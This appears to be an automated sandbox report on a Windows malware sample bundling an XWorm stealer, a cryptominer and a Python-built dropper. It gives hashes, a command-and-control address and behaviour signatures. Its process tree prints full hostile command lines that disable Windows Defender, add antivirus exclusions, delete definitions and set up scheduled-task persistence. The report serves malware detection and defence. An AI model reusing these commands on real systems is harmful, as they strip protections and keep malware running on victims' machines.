Analysis
-
max time kernel
23s -
max time network
50s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
22-05-2024 18:24
Static task
static1
General
-
Target
combined.exe
-
Size
11.4MB
-
MD5
aaa99d2d8a50c6da60aeb620fb3aa340
-
SHA1
c734c86f06640c029b6a0521ac59981ac2ad3c9b
-
SHA256
759b9d9aa2deef42f8278715a6ed61a5e3e221681615332c2aa49c4ff8911e3d
-
SHA512
d2be54052366f209f2dd7f38177585e0c98497d4fec77e0d58722cae57a573f265621fcdc8afb56941d377c61e956acccd6a1368a8b4f9d2c253722d05c2e337
-
SSDEEP
196608:HojZ9Dxm6UDwH/IxTWxQBxv5gK8NmjeR+SHLsl+W5djQD4x0:Hork6UDwgYx8V53Rc+SHYlPdjL
Malware Config
Extracted
xworm
engine-romania.gl.at.ply.gg:37581
-
Install_directory
%AppData%
-
install_file
discord.exe
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2256 MpCmdRun.exe -
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\System32\Stealer.exe family_xworm behavioral1/memory/428-370-0x0000000000620000-0x0000000000636000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5044 powershell.exe 3884 powershell.exe 5548 powershell.exe 4408 powershell.exe 4740 powershell.exe 2540 powershell.exe 4924 powershell.exe 3596 powershell.exe 2284 powershell.exe 1520 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops startup file 2 IoCs
Processes:
Stealer.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk Stealer.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk Stealer.exe -
Executes dropped EXE 6 IoCs
Processes:
Built.exeBuilt.exeminer.exeStealer.exediscord.exeamolcnprnsfi.exepid process 5052 Built.exe 1084 Built.exe 3256 miner.exe 428 Stealer.exe 664 discord.exe 5496 amolcnprnsfi.exe -
Loads dropped DLL 17 IoCs
Processes:
Built.exepid process 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe 1084 Built.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI50522\python311.dll upx behavioral1/memory/1084-93-0x00007FFEFD600000-0x00007FFEFDBF2000-memory.dmp upx \Users\Admin\AppData\Local\Temp\_MEI50522\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_ssl.pyd upx behavioral1/memory/1084-115-0x00007FFF12B00000-0x00007FFF12B24000-memory.dmp upx behavioral1/memory/1084-116-0x00007FFF16930000-0x00007FFF1693F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI50522\libcrypto-3.dll upx \Users\Admin\AppData\Local\Temp\_MEI50522\libffi-8.dll upx behavioral1/memory/1084-123-0x00007FFF12380000-0x00007FFF123AD000-memory.dmp upx behavioral1/memory/1084-127-0x00007FFF120D0000-0x00007FFF120E9000-memory.dmp upx behavioral1/memory/1084-129-0x00007FFF11B50000-0x00007FFF11B73000-memory.dmp upx behavioral1/memory/1084-131-0x00007FFEFC450000-0x00007FFEFC5CE000-memory.dmp upx behavioral1/memory/1084-147-0x00007FFF106F0000-0x00007FFF10723000-memory.dmp upx behavioral1/memory/1084-154-0x00007FFEFB340000-0x00007FFEFB40D000-memory.dmp upx behavioral1/memory/1084-155-0x00007FFEF9570000-0x00007FFEF9A99000-memory.dmp upx behavioral1/memory/1084-183-0x00007FFEFAFF0000-0x00007FFEFB10C000-memory.dmp upx behavioral1/memory/1084-182-0x00007FFF12C10000-0x00007FFF12C1D000-memory.dmp upx behavioral1/memory/1084-181-0x00007FFEFD110000-0x00007FFEFD124000-memory.dmp upx behavioral1/memory/1084-146-0x00007FFF15EA0000-0x00007FFF15EAD000-memory.dmp upx behavioral1/memory/1084-145-0x00007FFF10B90000-0x00007FFF10BA9000-memory.dmp upx behavioral1/memory/1084-280-0x00007FFEFAFF0000-0x00007FFEFB10C000-memory.dmp upx behavioral1/memory/1084-276-0x00007FFEF9570000-0x00007FFEF9A99000-memory.dmp upx behavioral1/memory/1084-278-0x00007FFF12C10000-0x00007FFF12C1D000-memory.dmp upx behavioral1/memory/1084-277-0x00007FFEFD110000-0x00007FFEFD124000-memory.dmp upx behavioral1/memory/1084-275-0x00007FFEFB340000-0x00007FFEFB40D000-memory.dmp upx behavioral1/memory/1084-271-0x00007FFEFC450000-0x00007FFEFC5CE000-memory.dmp upx behavioral1/memory/1084-274-0x00007FFF106F0000-0x00007FFF10723000-memory.dmp upx behavioral1/memory/1084-273-0x00007FFF15EA0000-0x00007FFF15EAD000-memory.dmp upx behavioral1/memory/1084-272-0x00007FFF10B90000-0x00007FFF10BA9000-memory.dmp upx behavioral1/memory/1084-270-0x00007FFF11B50000-0x00007FFF11B73000-memory.dmp upx behavioral1/memory/1084-269-0x00007FFF120D0000-0x00007FFF120E9000-memory.dmp upx behavioral1/memory/1084-265-0x00007FFEFD600000-0x00007FFEFDBF2000-memory.dmp upx behavioral1/memory/1084-268-0x00007FFF12380000-0x00007FFF123AD000-memory.dmp upx behavioral1/memory/1084-267-0x00007FFF16930000-0x00007FFF1693F000-memory.dmp upx behavioral1/memory/1084-266-0x00007FFF12B00000-0x00007FFF12B24000-memory.dmp upx -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
combined.exeStealer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Built = "C:\\Windows\\System32\\Built.exe" combined.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\miner = "C:\\Windows\\System32\\miner.exe" combined.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stealer = "C:\\Windows\\System32\\Stealer.exe" combined.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Roaming\\discord.exe" Stealer.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 8 IoCs
Processes:
combined.exeminer.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Built.exe combined.exe File created C:\Windows\System32\miner.exe combined.exe File opened for modification C:\Windows\System32\miner.exe combined.exe File created C:\Windows\System32\Stealer.exe combined.exe File opened for modification C:\Windows\System32\Stealer.exe combined.exe File opened for modification C:\Windows\system32\MRT.exe miner.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File created C:\Windows\System32\Built.exe combined.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
miner.exedescription pid process target process PID 3256 set thread context of 3908 3256 miner.exe dialer.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5024 sc.exe 2616 sc.exe 1896 sc.exe 4392 sc.exe 5360 sc.exe 5352 sc.exe 4444 sc.exe 2456 sc.exe 5032 sc.exe 4388 sc.exe 5296 sc.exe 4356 sc.exe 4780 sc.exe 5180 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4736 schtasks.exe 4976 schtasks.exe 208 schtasks.exe 4668 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeStealer.exeminer.exepowershell.exedialer.exeamolcnprnsfi.exepowershell.exepid process 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe 4740 powershell.exe 4740 powershell.exe 4740 powershell.exe 2540 powershell.exe 2540 powershell.exe 2540 powershell.exe 3608 powershell.exe 3608 powershell.exe 2540 powershell.exe 3608 powershell.exe 3608 powershell.exe 4924 powershell.exe 4924 powershell.exe 4924 powershell.exe 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 3884 powershell.exe 3884 powershell.exe 3884 powershell.exe 428 Stealer.exe 3256 miner.exe 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3908 dialer.exe 3908 dialer.exe 3908 dialer.exe 3908 dialer.exe 3908 dialer.exe 3908 dialer.exe 3256 miner.exe 3256 miner.exe 3256 miner.exe 3908 dialer.exe 3908 dialer.exe 3908 dialer.exe 3908 dialer.exe 5496 amolcnprnsfi.exe 3908 dialer.exe 3908 dialer.exe 3908 dialer.exe 5548 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
combined.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2520 combined.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeIncreaseQuotaPrivilege 4408 powershell.exe Token: SeSecurityPrivilege 4408 powershell.exe Token: SeTakeOwnershipPrivilege 4408 powershell.exe Token: SeLoadDriverPrivilege 4408 powershell.exe Token: SeSystemProfilePrivilege 4408 powershell.exe Token: SeSystemtimePrivilege 4408 powershell.exe Token: SeProfSingleProcessPrivilege 4408 powershell.exe Token: SeIncBasePriorityPrivilege 4408 powershell.exe Token: SeCreatePagefilePrivilege 4408 powershell.exe Token: SeBackupPrivilege 4408 powershell.exe Token: SeRestorePrivilege 4408 powershell.exe Token: SeShutdownPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeSystemEnvironmentPrivilege 4408 powershell.exe Token: SeRemoteShutdownPrivilege 4408 powershell.exe Token: SeUndockPrivilege 4408 powershell.exe Token: SeManageVolumePrivilege 4408 powershell.exe Token: 33 4408 powershell.exe Token: 34 4408 powershell.exe Token: 35 4408 powershell.exe Token: 36 4408 powershell.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeIncreaseQuotaPrivilege 4740 powershell.exe Token: SeSecurityPrivilege 4740 powershell.exe Token: SeTakeOwnershipPrivilege 4740 powershell.exe Token: SeLoadDriverPrivilege 4740 powershell.exe Token: SeSystemProfilePrivilege 4740 powershell.exe Token: SeSystemtimePrivilege 4740 powershell.exe Token: SeProfSingleProcessPrivilege 4740 powershell.exe Token: SeIncBasePriorityPrivilege 4740 powershell.exe Token: SeCreatePagefilePrivilege 4740 powershell.exe Token: SeBackupPrivilege 4740 powershell.exe Token: SeRestorePrivilege 4740 powershell.exe Token: SeShutdownPrivilege 4740 powershell.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeSystemEnvironmentPrivilege 4740 powershell.exe Token: SeRemoteShutdownPrivilege 4740 powershell.exe Token: SeUndockPrivilege 4740 powershell.exe Token: SeManageVolumePrivilege 4740 powershell.exe Token: 33 4740 powershell.exe Token: 34 4740 powershell.exe Token: 35 4740 powershell.exe Token: 36 4740 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeIncreaseQuotaPrivilege 208 WMIC.exe Token: SeSecurityPrivilege 208 WMIC.exe Token: SeTakeOwnershipPrivilege 208 WMIC.exe Token: SeLoadDriverPrivilege 208 WMIC.exe Token: SeSystemProfilePrivilege 208 WMIC.exe Token: SeSystemtimePrivilege 208 WMIC.exe Token: SeProfSingleProcessPrivilege 208 WMIC.exe Token: SeIncBasePriorityPrivilege 208 WMIC.exe Token: SeCreatePagefilePrivilege 208 WMIC.exe Token: SeBackupPrivilege 208 WMIC.exe Token: SeRestorePrivilege 208 WMIC.exe Token: SeShutdownPrivilege 208 WMIC.exe Token: SeDebugPrivilege 208 WMIC.exe Token: SeSystemEnvironmentPrivilege 208 WMIC.exe Token: SeRemoteShutdownPrivilege 208 WMIC.exe Token: SeUndockPrivilege 208 WMIC.exe Token: SeManageVolumePrivilege 208 WMIC.exe Token: 33 208 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Stealer.exepid process 428 Stealer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
combined.exeBuilt.exeBuilt.execmd.execmd.execmd.execmd.execmd.exeStealer.execmd.exeminer.exedialer.exedescription pid process target process PID 2520 wrote to memory of 4408 2520 combined.exe powershell.exe PID 2520 wrote to memory of 4408 2520 combined.exe powershell.exe PID 2520 wrote to memory of 4736 2520 combined.exe schtasks.exe PID 2520 wrote to memory of 4736 2520 combined.exe schtasks.exe PID 2520 wrote to memory of 5052 2520 combined.exe Built.exe PID 2520 wrote to memory of 5052 2520 combined.exe Built.exe PID 2520 wrote to memory of 4740 2520 combined.exe powershell.exe PID 2520 wrote to memory of 4740 2520 combined.exe powershell.exe PID 5052 wrote to memory of 1084 5052 Built.exe Built.exe PID 5052 wrote to memory of 1084 5052 Built.exe Built.exe PID 1084 wrote to memory of 2852 1084 Built.exe cmd.exe PID 1084 wrote to memory of 2852 1084 Built.exe cmd.exe PID 1084 wrote to memory of 3412 1084 Built.exe cmd.exe PID 1084 wrote to memory of 3412 1084 Built.exe cmd.exe PID 1084 wrote to memory of 756 1084 Built.exe cmd.exe PID 1084 wrote to memory of 756 1084 Built.exe cmd.exe PID 1084 wrote to memory of 2456 1084 Built.exe cmd.exe PID 1084 wrote to memory of 2456 1084 Built.exe cmd.exe PID 1084 wrote to memory of 996 1084 Built.exe cmd.exe PID 1084 wrote to memory of 996 1084 Built.exe cmd.exe PID 3412 wrote to memory of 3608 3412 cmd.exe powershell.exe PID 3412 wrote to memory of 3608 3412 cmd.exe powershell.exe PID 756 wrote to memory of 2364 756 cmd.exe mshta.exe PID 2852 wrote to memory of 2540 2852 cmd.exe powershell.exe PID 756 wrote to memory of 2364 756 cmd.exe mshta.exe PID 2852 wrote to memory of 2540 2852 cmd.exe powershell.exe PID 996 wrote to memory of 208 996 cmd.exe schtasks.exe PID 996 wrote to memory of 208 996 cmd.exe schtasks.exe PID 2456 wrote to memory of 168 2456 cmd.exe tasklist.exe PID 2456 wrote to memory of 168 2456 cmd.exe tasklist.exe PID 2520 wrote to memory of 4976 2520 combined.exe schtasks.exe PID 2520 wrote to memory of 4976 2520 combined.exe schtasks.exe PID 3412 wrote to memory of 2256 3412 cmd.exe MpCmdRun.exe PID 3412 wrote to memory of 2256 3412 cmd.exe MpCmdRun.exe PID 2520 wrote to memory of 3256 2520 combined.exe miner.exe PID 2520 wrote to memory of 3256 2520 combined.exe miner.exe PID 2520 wrote to memory of 4924 2520 combined.exe powershell.exe PID 2520 wrote to memory of 4924 2520 combined.exe powershell.exe PID 2520 wrote to memory of 208 2520 combined.exe schtasks.exe PID 2520 wrote to memory of 208 2520 combined.exe schtasks.exe PID 2520 wrote to memory of 428 2520 combined.exe Stealer.exe PID 2520 wrote to memory of 428 2520 combined.exe Stealer.exe PID 428 wrote to memory of 3596 428 Stealer.exe powershell.exe PID 428 wrote to memory of 3596 428 Stealer.exe powershell.exe PID 428 wrote to memory of 5044 428 Stealer.exe powershell.exe PID 428 wrote to memory of 5044 428 Stealer.exe powershell.exe PID 428 wrote to memory of 2284 428 Stealer.exe powershell.exe PID 428 wrote to memory of 2284 428 Stealer.exe powershell.exe PID 428 wrote to memory of 3884 428 Stealer.exe powershell.exe PID 428 wrote to memory of 3884 428 Stealer.exe powershell.exe PID 428 wrote to memory of 4668 428 Stealer.exe schtasks.exe PID 428 wrote to memory of 4668 428 Stealer.exe schtasks.exe PID 2108 wrote to memory of 1440 2108 cmd.exe wusa.exe PID 2108 wrote to memory of 1440 2108 cmd.exe wusa.exe PID 3256 wrote to memory of 3908 3256 miner.exe dialer.exe PID 3256 wrote to memory of 3908 3256 miner.exe dialer.exe PID 3256 wrote to memory of 3908 3256 miner.exe dialer.exe PID 3256 wrote to memory of 3908 3256 miner.exe dialer.exe PID 3256 wrote to memory of 3908 3256 miner.exe dialer.exe PID 3256 wrote to memory of 3908 3256 miner.exe dialer.exe PID 3256 wrote to memory of 3908 3256 miner.exe dialer.exe PID 3908 wrote to memory of 584 3908 dialer.exe winlogon.exe PID 3908 wrote to memory of 644 3908 dialer.exe lsass.exe PID 3908 wrote to memory of 728 3908 dialer.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Users\Admin\AppData\Roaming\discord.exeC:\Users\Admin\AppData\Roaming\discord.exe2⤵
- Executes dropped EXE
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\combined.exe"C:\Users\Admin\AppData\Local\Temp\combined.exe"2⤵
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
